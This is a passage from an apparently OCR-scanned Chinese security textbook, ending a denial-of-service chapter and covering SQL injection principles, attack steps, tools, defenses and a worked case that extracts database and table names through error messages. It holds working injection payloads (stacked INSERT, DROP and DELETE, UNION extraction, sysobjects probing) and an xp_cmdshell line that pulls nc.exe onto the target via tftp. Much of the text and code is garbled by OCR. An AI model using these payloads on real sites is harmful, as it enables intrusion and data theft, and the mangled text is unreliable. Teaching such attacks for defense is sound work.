表 , 然 后 其 同 这 些 地 址 发 送 数据 包 注 册 到 控制 侣 。 因 此 ,一 旦 发 现 一 个 攻击 计算 机 就 可 以 找 
到 控制 侣 。 同 样 ,控制 从 也 要 维持 一 个 攻击 计算 机 的 列表 以 便 发 送 攻 击 命令 ,因此 ,发 现 一 
个 控制 台 就 可 以 识别 出 并 破坏 掉 整 个 DDoS 网 络 。 由 于 攻击 计算 机 和 控制 台 都 在 特定 的 端 
口 进行 监听 ,使 用 网 络 扫 描 副 或 人 侵 检 测 系 统 就 可 以 找 出 控制 侣 和 攻击 主机 。 

此 外 ,病毒 .蠕虫 与 拒绝 服务 攻击 的 相互 关联 越 来 越 密 切 。 不 仅 病 毒 和 是 虫 本 上身 对 系统 
和 网 络 贤 源 的 占用 可 以 导致 拒绝 服务 ,其 至 有 些 蠕 忠 内 部 还 设计 了 专门 的 拒绝 服务 攻击 模 
块 , 以 对 预先 设置 的 目标 网 络 和 市 点 进行 破坏 。 


9.5.3 攻击 的 影响 


在 攻击 刘 来 的 影响 方面 ,拒绝 服务 攻击 表现 出 两 个 方面 的 发 展 趋势 ,一 是 波及 范围 增 
As 二 是 一 经 安 猴 即 可 发 动 攻击 , 扫 朱 和 传播 的 过 程 缩 短 或 融和 人 攻击 的 过 程 中 。 

1. 波及 范围 更 大 

一 般 而 言 ,Dos 的 影响 与 其 可 利用 资源 的 规模 有 关 。 现 在 的 攻击 方法 及 攻击 工具 使 得 
攻击 背 有 大 量 的 资源 可 以 利用 。 攻 击 市 来 的 附加 破坏 性 也 在 逐渐 增 大 ,这 里 的 附加 破坏 是 
指 与 换 源 消耗 没有 直接 联系 的 破坏 。 例 如 ,采用 安全 监控 技术 ,或 者 提供 简单 的 行为 审计 都 
会 因为 攻击 而 导致 在 某 些 特定 网 络 上 产生 大 量 的 数据 。 像 Code Red 和 Nimda 就 通过 频繁 
的 活动 而 导致 大 量 的 审计 数据 ,这 使 得 很 多 备份 系统 因数 据 的 激增 而 出 现 问 题 。 很 多 的 
Internet 站 点 都 是 和 其 他 的 网 络 ( 如 其 上 一 级 网 络 ) 相 连 的 ,有 时 其 审 锅 费用 是 与 实际 的 市 
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ie E H EF AY . DoS 攻击 及 由 此 带 来 的 大 量 的 数据 流量 也 使 得 受害 者 的 损失 增加 。 

另外 ,服务 的 合并 与 外 购 主 机 服务 也 使 得 针对 一 个 设施 或 服务 的 攻击 导致 了 其 他 设施 
或 服务 受 损 ,仅仅 因 为 它们 与 被 攻击 目标 “ 相 邻 ?而 已 。 

2. 一 经 安装 即行 攻击 

Code Red( 红 色 代 码 )、Code Red I 8I Nimda 都 表明 ,高 度 自动 化 的 攻击 工具 从 一 开始 
安 妆 上 就 能 立即 对 Internet 范围 内 的 多 个 目标 展开 攻击 。 扫 摘 和 传播 已 经 不 构成 大 的 危害 
T. Æ Code Red 事件 中 ,主要 的 攻击 目标 反而 没有 受到 多 大 的 损害 ,其 带 来 的 间接 损失 却 
成 了 主要 问题 。 除 了 已 经 提 到 的 间接 损失 外 ,那些 有 较 多 计算 机 被 感染 的 网 络 也 很 快 就 被 
地 址 解析 ARP 风暴 所 淹没 ,原因 在 于 Code Red 蠕虫 极 快 的 扫描 行为 。 这 导致 了 局 部 的 、 
小 范围 内 的 拒绝 服务 攻击 。 


9.6 Jk 

本 和 曹 从 拒绝 服务 攻击 的 概念 和 目的 开始 讲 起 ,讲解 了 拒绝 服务 攻击 的 运行 机 制 .拒绝 服 
务 攻击 发 生 的 过 程 , 还 有 拒绝 服务 攻击 的 种 类 、 工 具 , 最 后 还 有 拒绝 服务 攻击 的 发 展 趋 长 等 。 
然后 又 分 别 从 防御 、 检 测 和 扎 足 等 朋 度 讨论 了 拒绝 服务 攻击 的 对 策 。 总 体 来 说 ,技术 是 基 
砷 ,管理 是 最 关键 的 因 隶 ,必须 加 强 管理 ,技术 与 管理 相 融 合 。 


习题 9 


1. 拒绝 服务 攻击 的 这 种 攻击 方式 破坏 了 ( WA. 


A. 网 络 服务 的 可 用 性 B. 网 络 信息 的 完整 性 
C. 网 络 信息 的 保密 性 D. 网 络 信息 的 抗 抵赖 性 


. 什么 是 服务 ? 什么 是 拒绝 服务 ?” 什么 是 拒绝 服务 攻击 ? 
. 典型 拒绝 服务 攻击 的 手段 有 哪些 , 试 举例 说 明 。 

. M DDoS 的 特点 及 第 用 的 攻击 手段 。 

. 何 述 拒绝 服务 攻击 的 典型 过 程 。 

. 何 述 拒绝 服务 攻击 防御 的 分 类 。 

. 请 月 己 做 实验 ,实现 SYN 攻击 。 


CHAPTER 10 


SQL 注入 攻击 与 防范 第 10 章 


10.1 SQL 注入 攻击 彰 景 危害 与 原理 


10.1.1 SOL 注入 攻击 背景 


BH B/S 模式 应 用 开发 的 发 展 , 用 B/S 模式 编写 的 应 用 程序 越 来 越 多 。 
很 多 程序 员 在 编写 代码 的 时 候 可 能 会 忽略 对 用 户 输入 的 信息 的 合法 性 进行 
检查 ,这 样 束 会 使 得 应 用 程序 有 安全 隐患 。 当 用 户 提 有 交 一 段 数 据 库 查 询 代 
13 ,程序 就 可 以 返回 他 想 要 的 绪 末 ,这 驶 是 所 谓 的 SQL Injection. BJ SQL 


10.1.2 SOL 注入 攻击 危害 


发 生 SQL 注入 可 能 会 谈 取 、 修 改 或 删除 数据 库 中 的 数据 ,并 且 获 得 用 户 
名 或 密码 等 敏感 信息 ; 得 到 管理 员 的 权限 ; 如 果 能 够 利用 SQL Server 扩展 
存储 过 程 和 自 定 义 扩展 存储 过 程 来 执行 一 些 系 统 命令 ,攻击 者 就 可 以 获得 该 
系统 的 控制 权 ; SQL 注入 是 从 正常 的 WWW 端口 访问 ,具有 隐蔽 性 ,防火 墙 
一 般 不 报警 ,很 难 发 现 。 


10.1.3 SOL 注入 攻击 原理 


SQL 注入 攻击 (SQL Injection Attack) ,主要 是 指 利 用 连接 后 台数 据 库 
中 的 Web 应 用 程序 漏洞 , 插 和 人 恶意 SQL 语句 ,以 实现 对 数据 库 攻击 。SQL 
注入 就 是 癌 网 站 提交 精心 构造 的 SQL 查询 语句 ,导致 网 站 将 关键 数据 信息 
BRE, SQL 是 一 种 用 来 和 数据 库 交 互 的 查询 语言 。 例 如 ,假设 某 网 站 有 以 下 
服务 : 


http: //duck/ index. asp?category = food 


其 后 台 对 应 的 Web 程序 如 下 : 
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v cat = request("category") 
sqlstr = "SELECT * FROM product WHERE PCategory = ' &Áv cat & "'" 
set rs = conn. execute( sqlstr) 


正常 情况 下 ,数据 库 对 外 部 查询 请 求 对 应 的 执行 程序 为 
SELECT * FROM product WHERE PCategory = 'food' 


此 时 ,查询 用 户 只 能 得 到 food 相关 的 信息 。 但 是 ,如 采 一 个 恶意 的 用 户 提 区 以 下 


请 求 。 


http: //duck/index. asp?category = food' or 12 1 -- 


X Hy BE ,数据库 对 外 部 查询 请 求 对 应 的 执行 程序 如 下 。 
SELECT * FROM product WHERE PCategory = 'food'or1-1--' 


查询 用 户 通 过 该 SQL 语句 不 仅 得 到 food 相关 信息 ,而且 会 得 到 所 有 product KAA., 

综 上 所 述 ,SQL 注入 攻击 主要 特点 是 利用 通过 Web 应 用 程序 中 未 对 程序 变量 进行 安 
全 过 滤 处 理 , 从 而 攻击 者 通过 在 输入 程序 变量 的 参数 时 ,故意 构造 特殊 的 SQL 请 句 , 以 使 后 
台 的 数据 库 执行 非法 指令 ,从 而 可 以 操控 数据 库 内 容 , 达 到 攻击 目的 。 


10.1.4 SOL 注入 攻击 场景 


SQL 注入 攻击 一 般 发 生 在 具有 交互 性 操作 数据 库 的 访问 环境 ,理论 上 来 讲 , 只 要 用 户 
能 够 利用 程序 和 数据 库 进 行 交 互 操作 ,用 户 可 以 通过 交互 窗口 改写 数据 库 后 台 的 SQL 语句 
(如 网 页 查询 、 网 页 表格 填写 单 ) ,就 有 可 能 发 生 SQL 注入 攻击 。 同 传统 的 OS 系统 攻击 不 
一 样 ,SQL 注入 攻击 利用 了 应 用 程序 编程 的 漏洞 ,攻击 访问 过 程 可 以 通过 正常 的 WWW 端 
口 访问 ,因此 ,表面 看 起 来 与 一 般 的 Web 页 面 访问 没有 什么 区 别 , 而 且 防 火 墙 都 不 会 对 
SQL 注入 攻击 发 出 警报 。 典 型 攻击 场景 如 图 10-1 所 示 。 


浏览 器 应 用 pug 。 ”Web 服务 器 应 用 服务 器 。 数据 库 










BET 
http://foo.com/show/]sp? 
log in=doe&pass=xyz 











http: l/foo.com /show.jsp Login-doePass-xyz 






图 10-1 SQL 注入 攻击 场景 图 


攻击 者 可 以 利用 show. jsp 来 操作 网 站 后 台数 据 库 的 内 容 ,其 至 上 传 恶 意 程 序 到 网 站 
上 。 由 于 传统 的 防火 墙 受 限于 问 口 和 协议 过 滤 , 因 此 对 于 SQL 注 和 人 攻击 无 法 防范 ,攻击 者 
将 通过 80 吴 口 ,利用 网 站 应 用 程序 进入 受害 痢 的 系统 。 一 般 来 说 ,利用 SQL 注入 攻击 ,可 
能 达到 绕 过 安全 认证 机 制 、 数 据 非 授权 访问 拒绝 服务 攻击 、 远 程 命令 执行 等 攻击 意图 。 例 
如 ,利用 网 站 应 用 程序 的 漏洞 ,可 以 构造 以 下 攻击 语句 。 
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CD 猜测 用 户 bob 口令 的 SQL 注入 攻击 语句 。 


SELECT email, passwd, login id, full name 
FROM members 
WHERE email = ‘bob(@example.com'AND passwd = 'hello123'; 


(2) 添加 账号 的 SQL 注入 攻击 语句 。 


SELECT email, passwd, login id, full name 
FROM members 
WHERE email = 'x'; 
INSERT INTO members ('email', 'passwd', login id',' full name") 
VALUES ('steve(Qunixwiz.net', 'hello', 'steve', 'Steve Friedl'); -- '; 


(3) 删除 表 的 SQL 注入 攻击 语句 。 
SELECT email, passwd, login id, full name 


FROM members 
WHERE email = 'x'; DROP TABLE members; -- '; 


10.2 SOL 注入 技术 方法 与 工具 


10.2.1 SOL 注入 技术 


1. 页 面 遍历 技术 

PT SERIE TR 从 一 个 种 子 URL 开始 ,不 断 扩 大 下 载 面 。 采 用 了 线程 池 机 制 , 同 
时 启动 多 个 线程 息 行 网 页 。 通 过 HTTP 1.1 JW y5'Bb 4E V. B9 Fg Zx yk E (Persistent 
Connection) 来 减少 与 服务 需 的 TCP 连接 数量 。 从 同一 主机 上 有 疏 行 多 个 网 页 时 只 需 建立 一 
^ TCP 连接 。 

2. 有 效 页 面 采集 技术 

HT EEKE mua URL 地 址 。 除 采集 href 标记 后 的 网 址 链接 外 ,还 要 米 集 后 
级 为 . asp.. jsp 及 .php 等 的 网 址 链接 。 对 于 非 完整 的 URL 地 址 ,进行 添加 前 级 的 工作 。 


10.2.2 SOL 注入 攻击 过 程 


SQL 注入 攻击 过 程 一 般 包 括 4 PAR oP I BG ANP 

第 一 步 ,从 网 站 中 挑 出 动态 访问 数据 库 的 URL 地 址 。 一 般 来 说 ,SQL 注入 一 般 存 在 于 
形式 如 http://xxx. xxx. xxx/abc. asp? id= XX 等 市 有 参数 的 动态 网 页 中 ,动态 网 页 可 以 
有 一 个 参数 ,也 可 以 有 多 个 参数 。 人 参数 可 以 是 整 型 的 ,也 可 以 是 字符 串 型 的 ,不 能 一 概 而 论 。 
总 之 ,又 要 动态 网 页 带 有 参数 并 且 还 访问 了 数据 库 , 那 么 就 有 可 能 存在 SQL 注入 。 如 果 
ASP 程序 员 没 有 考虑 到 这 一 点 或 没有 安全 意识 ,未 能 进行 字符 过 滤 ,存在 SQL 注入 的 可 能 
性 就 变 得 非常 大 。 
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第 二 步 ,判断 选 定 的 URL 地 址 是 否 可 以 进行 SQL 注入 漏 洞 。 其 中 ,漏洞 的 识别 分 有 
两 种 情形 来 判断 ,以 http: //xxx. xxx. XXX/abc. asp? p= YY 为 例 进行 分 析 ,YY 可 能 是 整 
型 ,也 有 可 能 是 字符 串 。 

(1) 整 型 参数 的 判断 方法 。 当 参数 YY 为 整 型 时 ,通常 abc. asp 中 SQL iff] KB F. 


select * from 表 名 where 字段 = YY; 


接 下 来 可 以 用 以 下 步骤 测试 SQL 注 和 人 是 否 人 存在 。 

(D http://xxx. xxx. xxx/abc. asp? p 王 YYI( 附 加 一 个 单 引 号 ) ,此 时 abc. ASP 中 的 
SQL 语句 可 与 成 : 

select * from X44 where 字段 = YY' 
abc. asp i& T Ft‘ © 

(2) http://xxx. xxx. xxx/abc. asp? p= YY and 1 1. abc. asp 运行 正常 ,而 且 与 http:// 
xxx. xxx. xxx/abc. asp? p= Y Y 结果 相同 。 

(3) http://xxx. xxx. xxx/abc. asp? p= YY and 1=2, abc. asp is T à, 

如 果 以 上 三 步 全 面 满 足 ,abc. asp 中 一 定 存 在 SQL 注入 漏洞 。 

(2) 字符 串 型 参数 的 判断 。 


select * from 表 名 where 字段 = 'YY' 


接 下 来 可 以 用 以 下 步 又 测试 SQL 注 人 是否 存在 。 
(D http://xxx. xxx. xxx/abc. asp? p 王 YY'( 附 加 一 个 单 引 号 ) ,此 时 abc. asp 中 的 SQL 
语句 可 写成 : 


select * from 表 名 where ^E EE = YY' 


abc. asp ZÍTRA. 

(2 http;//xxx. xxx. xxx/abc. asp? p= YYG&;nb ... 39;1'='1', abc. asp 运行 正常 ,而 
H.E http://xxx. xxx. xxx/abc. asp? p= YY 运行 结果 相同 。 

(3 http;//xxx. xxx. xxx/abc. asp? p= YY&:nb... 39;1'='2', abc. asp 运行 异常 。 

gy UL E = 26 EME sabe. asp 中 一 定 存 在 SQL 注入 漏洞 。 

第 三 步 , 利 用 URL 地 址 对 应 的 应 用 程序 漏洞 ,构造 SQL 注入 攻击 语句 ,获取 后 台 效 据 
库 中 的 信息 。 典 型 攻击 语句 如 下 。 


http: //xxx. xxx. xxx/abc. asp?p = YY and (select count( * ) from sysobjects)> 0 

http: //xxx. xxx. xxx/abc. asp?p = YY and (select count( * ) from msysobjects)> 0 

http: //duck/ index. asp? id = 10 UNION SELECT TOP 1 COLUMN NAME FROM INFORMATION SCHEMA. COLUMNS 
WHERE TABLE NAME = 'admin login'-- 

http: //duck/ index. asp? id = 10 UNION SELECT TOP 1 login name FROM admin login 一 一 
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第 四 步 ,根据 网 站 执行 SQL 注入 攻击 声名 的 反馈 信息 ,逐步 提升 SQL 注入 攻击 的 能 


http://duck/index.asp?id = 10; INSERT INTO 'admin login'('login id', 'login name', 'password', ' 
details') VALUES (666, 'neo2', 'newpas5 ', 'NA')— 


以 上 是 通用 的 SQL 注入 过 程 ,对 于 不 同 的 数据 库 来 说 ,过 程 操 作 步 又 略 有 不 同 ,主要 表 
现在 如 何 获取 远程 数据 库 的 绪 构 依 息 ,以 及 数据 库 所 文 持 功 能 。 如 图 10-2 所 示 , 典 型 的 
SQL Server 型 数据 库 的 广 和 人 流程 如 下 。 


URLI IE 


EL 
I 





蚀 误 信息 


Tu J Ez 





S 


E, 
AL 


利用 字典 文件 


利用 系统 月 | 


AMET. X AMET xu 





字段 名 字段 名 


ASCII 折 半 法 
获得 记录 (用 户 名 、 





口令 ) 


利用 系统 表 


后 台 登 条 


10-2 SQL 注入 过 程 图 


10.2.3 SOL 注入 方法 类 型 

SQL 注入 攻击 典型 技术 有 3 种 类 型 : SQL 操控 ,代码 注入 ,功能 调用 注入 。 这 3 种 方 
法 的 摘 述 如 下 。 

1. SOL 操控 

SQL 操控 是 指 攻 击 者 对 已 有 的 SQL 语句 中 的 变量 进行 改变 ,如 改变 Where 条 件 选 项 
等 。 例 如 ,正常 的 用 户 验 证 SQL 语句 如 下 。 
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SELECT * FROM users WHERE username = 'bob'and PASSWORD = mypassword 


但 是 ,攻击 痢 利用 程序 的 漏洞 ,试图 构造 以 下 SQL ,以 逃避 用 户 认 证 机 制 。 


SELECT * FROM users WHERE username = 'bob'and PASSWORD = 'mypassword'or a = 'a' 


2. 代码 注入 

代码 注入 是 指 攻 击 者 对 已 有 的 SQL 语句 后 面 ,额外 地 增加 攻击 用 途 的 SQL 语句 ,如 
添加 账户 、 删除 数据 表 等 。 例 如 ,攻击 者 利用 添加 Delete SQL 语句 删除 admin 用 户 相 关 
信息 。 


SELECT * FROM users WHERE username = 'bob'and PASSWORD = 'mypassword'; DELETE FROM users WHERE 
username = 'admin'; 


3. 功能 调用 注入 
攻击 者 利用 数据 库 提 供 的 功能 调用 ,如 扩展 存储 过 程 、 在 操作 系统 上 安 交 程序 .打开 通 
信 冯 口 等 ,然后 控制 整个 数据 库 。 扩 展 存 储 过 程 是 指数 据 库 调用 外 部 功能 的 动态 链接 库 ， 
MS SQL Server 包含 很 多 扩展 存储 过 程 , 如 “exec master..xp cmdshell ‘net user”, 可 以 得 
SAPIR. K 10-1 所 示 为 第 见 扩展 存储 过 程 的 使 用 方法 。 
#10-1 常见 扩展 存储 过 程 


xp_cmdshell exec master.. xp cmdshell 'net start' 
xp ntsec enumdomains TUTTI exec master..xp ntse enumdomains 


xp gettiledetails 获取 指定 文件 的 详细 信息 exec master..xp getfiledetails 'c:\boot. ini' 
xp fileexist 判断 文件 或 目录 是 否 存 在 exec master..xp fileexist 'c:\boot. ini' 
xp msver 获取 系统 信息 exec master, dbo. xp msver 


Xp availablemedia 列举 可 用 的 系统 分 区 exec xp availablemedia 

xp enumgroups 列举 系统 中 的 用 户 组 exec xp enumgroups 
Ete ER) o fr Hs H8 BI) — 
个 档案 中 


xp servicecontrol 控制 指定 的 服务 exec xp servicecontroi 'start',. 'schedule' 


攻击 者 利用 这 些 过 程 ,就 可 以 远程 操控 目标 系统 。 例 如 ,攻击 者 利用 数据 库 master... xp - 
cmdshell 功能 调用 ,在 目标 计算 机 上 安装 黑客 工具 nc, 


Xp_makecab exec xp makecab 'c:\l. cab', MSZIP. 1 





http://XXX. XXX. XXX. XXX/purchase. asp? ID = 2; % 20EXEC% 20master..xp cmdshell 'tftp% 20i% 
20192.168.0.8 % 20GET % 20nc. exe $ 20c:\nc. exe' 


10.2.4 SOL 注入 攻击 软件 
针对 SQL 注入 攻击 ,目前 已 经 有 许多 软件 来 实现 攻击 的 自动 化 。 篆 用 的 工具 有 
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Domain3.5\ 啊 了 DD 注入 工具 和 NBSI。 根 据 www. security-hacks. com 网 站 提供 的 资料 ,列举 
了 国际 上 排名 前 15 位 的 SQL 注入 攻击 工具 软件 ,下 面 分 别 介绍 。 

(1) SQLIer。SQLIer 软件 利用 有 漏洞 的 URL 地 址 ,自动 尝试 SQL 注入 ,不 需要 交互 。 

(2) SQLbftools, SQLbftools 利用 SQL Bit MiG (blind SQL Injection attack) FRIR 
取 MySQL 信息 。 

(3) SQL Injection Brute-forcer, SQL Injection Brute-forcer 具有 有 目 动 检测 和 挖掘 利用 
SQL 注入 狂 洞 的 能 力 , 该 软件 文 持 可 和 视 和 SQL AEN -o 

(4) SQLBrute, SQLBrute 是 一 个 使 用 育 SQL HEA BEAT 3X BOSCUS FE 2908 HJ LH. 
支持 Microsoft SQL Server 和 Oracle 的 出 错 信 息 利用 攻击 ,编程 语言 为 Python。 

(5) BobCat。BobCat 是 一 个 帮助 审计 员 分 析 SQL 注 人 漏洞 的 工具 。 

(6) SQLMap。SQLMap 是 一 个 利用 python 开发 而 成 的 SQL 盲 注 攻击 ,具有 数据 库 
识别 和 远程 管理 效 据 库 的 能 力 。 

(7) Absinthe. Absinthe 是 一 个 图 形 化 .利用 SQL 育 注 攻击 的 工具 ,具有 月 动 下 载 目 
标 数 据 库 的 结构 和 内 容 的 能 力 。 

(8) SQL Injection Pen-testing Tool, SQL Injection Pen-testing Tool 是 一 个 基于 图 形 
界面 的 工具 ,通过 Web 应 用 程序 检测 数据 库 的 漏洞 。 

(9) SQL Injection Digger(SQLID) 。SQL Injection Digger(SQLID) 是 一 命令 行程 序 ， 
能 够 查找 网 站 中 SQL 注入 漏洞 。 利 用 该 工具 ,可 以 搜索 存在 SQL 注入 网 页 ,并 测试 SQL 
注入 漏洞 。 

(10) Blind SQL Injection Perl Tool, Blind SQL Injection Perl Tool 是 用 perl 编写 的 
SQL 注入 测试 脚本 ,可 以 获取 网 站 中 存在 SQL 注入 漏洞 的 网 页 。 

(11) SQL Power Injection Injector, SQL Power Injection Injector 是 一 个 渗透 测试 工 
具 , 文 持 多 线程 育 注 攻击 。 

(12) FJ-Injector Framwork, FJ-Injector Framwork 采取 开源 的 框架 结构 ,具有 查找 网 
站 应 用 程序 中 SQL 注入 漏洞 的 能 力 , 文 持 代 理 功 能 。 

(13) SQLNinja, SQLNinja 是 一 个 挖掘 利用 SQL 注入 漏洞 的 工具 ,适宜 于 Microsoft 
SQL Server 。 

(14) Automagic SQL Injector, Automagic SQL Injector 是 一 个 目 动 化 渗透 工具 ,适宜 
于 Microsoft SQL 漏洞 。 

(15) NGSS SQL Injector, NGSS SQL Injector 是 一 个 挖掘 利用 SQL 注 和 人 漏洞 工具 ， 
适宜 于 Access, DB2,Informix, MSSQL,MySQL Oracle 和 Sysbase。 


10.3 SQL iE AX ii LRA 2j i 


1. 在 编程 中 对 用 户 输入 进行 检查 
一 些 特殊 字符 ,如 分 号 . 单 引号 、 豆 号、 双 引号 .冒号 、 连 接 号 等 都 要 进行 转换 或 过 滤 ; 使 
用 强 数据 类 型 ,如 用 户 输入 一 个 整数 ,就 可 以 把 这 个 整数 转化 为 整数 形式 ; 限制 用 户 输入 的 
字符 串 长 度 等 。 这 些 检查 要 放 在 Server 运行 ,Client 提交 的 任何 东西 都 是 不 可 信 的 。 
SQL 注入 攻击 主要 是 利用 了 应 用 程序 缺少 数据 过 滤 的 漏洞 ,导致 非法 数据 被 输入 并 执 
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可 络 攻 防 原 理 及 应 用 
行 。 因 此 ,对 网 站 应 用 程序 的 输入 变量 进行 必要 的 安全 过 滤 与 参数 验证 ,禁止 一 切 非 预期 的 


参数 传递 到 后 台数 据 库 服务 硕 。 安 全 过 滤 方 法 有 以 下 两 种 。 

(D 拒绝 已 知 的 恶意 输入 ,如 insert, update.delete,or,drop 等 。 

(2) 只 接收 已 知 的 正常 输入 ,如 在 一 些 表 单 中 允许 数字 和 大 、 小 写字 母 等 。 

2. 数据 库 表 名 、 列 名 不 要 用 常用 的 字符 

数据 库 表 名 、 列 名 不 要 用 常用 的 字符 ,特别 是 存储 用 户 名 和 密 公 的 表 名 、 字 段 名 ,不 要 使 
用 如 Admin、adminlist、password、pwd 等 第 用 的 字符 。 

3. 使 用 不 常用 的 字符 

网 站 后 台 官 理 目录 和 登录 文件 名 要 使 用 不 常用 的 字符 ,不 要 使 用 如 /admin/login. asp 
或 /guanli/denglu. asp 等 文件 名 。 

4. 设置 应 用 程序 最 小 化 权限 

由 前 面 分 析 可 知 SQL 注入 攻击 ,注入 程序 还 是 利用 Web 应 用 程序 权限 对 数据 库 进行 
操作 ,如 果 最 小 化 设置 数据 库 和 Web 应 用 程序 的 执行 权限 ,那么 就 可 以 阻止 非法 SQL TAL 
ÍT ,减少 攻 击破 坏 影 响 。 以 MS SQL Server 为 例 , 通 常 部 是 以 本 地 管理 员 号 份 安 站 并 运行 
SQL Server 服务 ,该 用 户 的 权限 在 Windows 2000 中 与 系统 管理 员 相当 ,攻击 者 一 旦 突破 了 
数据 库 的 限制 ,就 可 以 无 限制 访问 主机 。 因 此 ,要 以 受 限 用 户 的 身份 安装 并 运行 DBMS, H 
给 予 运行 所 必需 的 权限 。 同 时 ,对 于 Web 应 用 程序 与 数据 库 的 连接 ,建立 独立 的 账号 ,使 用 
最 小 权限 执行 数据 库 操作 ,避免 应 用 程序 以 DBA 身份 与 数据 库 连 接 , 以 免 给 攻击 者 可 乘 之 
机 。 特 别 是 不 要 用 dbo 或 sa 账户 ,为 不 同 的 类 型 的 动作 或 组 使 用 不 同 的 账户 。 

5. 使 用 SOL 语句 

在 使 用 存储 过 程 中 如 果 一 定 要 使 用 SQL 语句 ,一 定 要 用 标准 的 方式 组 建 SQL 语句 ,如 
利用 parameters 对 象 ifj Ze AR NER PE SQL 命令 。 

6. 屏蔽 应 用 程序 错误 提示 信息 

当 SQL 运行 出 现 错误 的 时 候 , 不 要 把 全 部 的 数据 库 返 回 的 错误 信息 显示 给 用 户 , 往 往 
错误 信息 会 透露 一 些 数据 库 设计 的 细节 ， 

SQL 注入 攻击 是 一 种 符 试 攻击 技术 ,攻击 者 会 利用 SQL Sut ze BUS fe e ok HE Ir XC 
据 库 的 结构 ,以 及 有 价值 的 信息 。 在 默认 情况 下 ,数据库 查询 和 页 面 执行 中 出 错 的 时 候 , 用 
户 浏 览 耸 上 将 会 出 现 错误 信息 ,这 些 信 息 包 括 了 ODBC 类 型 .数据库 引擎 ,数据库 名 称 、 表 
名 称 、 变 量 、 错 误 类 型 等 语 多 内 容 , 如 图 10-3 所 示 。 


Norilla Firefox 
文件 oc) 编辑 GU 查看 qo Fal @ BE OG) 工具 (CD 帮助 OD 


<a z E» - & C3 || | http: //ZZZ. YYY. XXX. XXX/index. asp 
MAI LO 最 新 头条 BSS 





Microsoft OLE DB Provider for ODBC Drivers 5Éi& '80040el4' 


[Microsoft] [ODBC Microsoft Access Driver] Wikii (HIFZ) TADAN HA = OR lsr AND 4299 = 7123! and 





10-3 ”应 用 程序 错误 信息 显示 
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因此 ,针对 这 种 情况 ,应 用 程序 应 有 屏蔽 挥 错误 信 息 显 示 到 浏览 器 上 的 功能 ,从 而 可 以 
避免 人 侵 者 获取 数据 库 内 部 信息 。 

7. 利用 评测 软件 检测 网 站 

利用 评测 软件 检测 网 站 。 例 如 ,NBSI、NIKTO 等 软件 检测 网 站 是 否 有 注入 漏洞 。 

8. 对 开源 软件 做 安全 适应 性 改造 

目前 许多 网 站 都 是 采用 人 免费 下 载 的 模板 建成 ,其 源 代码 是 公开 的 ,网 站 程序 中 的 SQL 
注入 漏洞 很 容易 发 现 , 而 且 数 据 库 的 表 结 构 是 公开 的 。 利 用 开源 网 站 应 用 程序 ,攻击 者 无 须 
猜测 就 可 以 知道 网 站 后 台数 据 库 的 类 型 ,以 及 各 种 表 结 构 ,这样 对 于 攻击 者 来 说 , 较 容 易 地 
进行 SQL 注入 攻击 。 因 此 ,网 站 采用 开源 应 用 程序 ,安全 最 佳 的 实践 就 是 根据 本 部 门 的 需 
要 ,对 可 能 存在 SQL 注入 攻击 的 应 用 程序 进行 安全 增强 ,或 者 调整 数据 库 表 的 结构 以 干扰 
攻击 。 

9. 网 站 实施 主动 防御 

SQL 注入 攻击 是 通过 网 站 的 访问 进行 的 ,特别 是 大 量 的 猜测 性 访问 网 页 ,必然 会 引起 
网 站 服务 器 异常 流量 ,如 网 站 的 非 成 功 连接 信息 或 异常 URL 长 度 等 。 网 站 管理 员 通 过 分 
析 网 站 运行 日 志 , 也 会 发 现 SQL 注入 攻击 痕迹 。 在 主动 安全 分 析 基 础 上 ,对 于 湾 在 危害 的 
访问 者 的 地 址 进行 封 堵 ,以 防止 攻击 危害 发 生 。 目 前 ,网 站 主动 防御 技术 措施 主要 有 日 志 4 
析 、 网 络 内 容 过 滤 IPS 等 。 例 如 ,根据 SQL 注入 攻击 的 特点 ,有 可 能 导致 数据 库 出 错 信 息 
增加 ,或 者 检查 网 站 请 求 出 错 信息 ,因为 这 些 信 息 与 SQL 注入 攻击 紧密 相关 ,因而 可 以 作为 
网 站 管理 员 察 觉 SQL 注入 攻击 的 有 效 依 据 。 


10.4 ”实战 案例 一 一 利用 SQL 注入 获取 管理 员 口 令 


以 某 网 站 为 http; // XXX. XXX. XXX. XXX/reference cn/sortabc. asp?id =d 为 例 , 利 
用 SQL Injection 获取 管理 员 口 令 。 
C) 在 网 址 末尾 添加 单 引 号 “'”, 其 反馈 信息 如 下 。 


期 刊 刊 名 列表 
Microsoft OLE DB Provider for ODBC Drivers #2 's80040el4' 


[Microsoft] [ODBC SQL Server Driver] [SQL Server]Unclosed quotation mark before the 
character string 'd' and a. sourceid=b. sourceid order by a.sname '. 


freference_cn/sortabc. asp, ÍT4T 


从 这 个 错误 提示 可 以 看 出 以 下 几 点 。 

网 站 使 用 的 是 SQL Server 数据 库 ,通过 ODBC 引擎 连接 数据 库 。 

O 该 系统 信息 提示 已 开启 ,同时 该 注 人 参数 类 型 为 字符 型 。 

(2) 在 网 址 末尾 添加 'and (select count( * ) from master. dbo. sysdatabases where 
name >0 and dbid=1)>0 and "一 ,其 反馈 信息 如 下 。 
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网 


name from REF_CS. dbo. sysobjects where xtype 





28 Woh JE 38 Ry H 


Jn Fl ZH € 


Microsoft OLE DB Provider for ODBC Drivers 错误 ` 80040e07’ 


[Microsoft] (ODBC SQL Server Driver] (SQL Server]Syntax error converting the nvarchar 
value ‘master’ to a column of data type int. 


/reference cn/sortabc. asp. {747 


通过 这 个 错误 提示 可 知 该 系统 存在 名 为 master 的 数据 库 , 修 改 dbid 的 值 直 到 得 到 想 


要 查找 的 数据 库 名 称 。 本 例 修 改 其 值 为 22, 可 得 到 数据 库 REF_CS, 其 反馈 信息 如 下 。 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' 


[Microsoft][ODBC SQL Server Driver] [SQL ServerlSyntax error converting the nvarchar 
value 'REF CS to a column of data type int. 


/reference cn/sortabc.asp: 7747 


(3) 在 网 址 未 尾 添 加 : 'and (select top 1 name from REF. CS. dbo. sysobjects where 


xtype='U')>0 and ''— ',. Hs ifii RW F. 


FI vw 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 * 80040e07’ 


[Microsoft][ODBC SQL Server Driver] (SQL ServerlSyntax error converting the nvarchar value 's class! to a column of data 
type int. 


/reference cr/sortabc.asp: 行 47 


从 此 钳 误 提示 可 看 出 此 数据 库 中 存在 名 为 s class 的 表 。 继 续 添 加 : 'and (select top 1 








'U' and name not in ('s_class'))> 0 


and "一 '…, 其 反馈 信息 如 下 。 


期 刊 刊 名 列表 


Microsoft OLE DB Provider for ODBC Drivers 错误 ?80040e0T7’ 

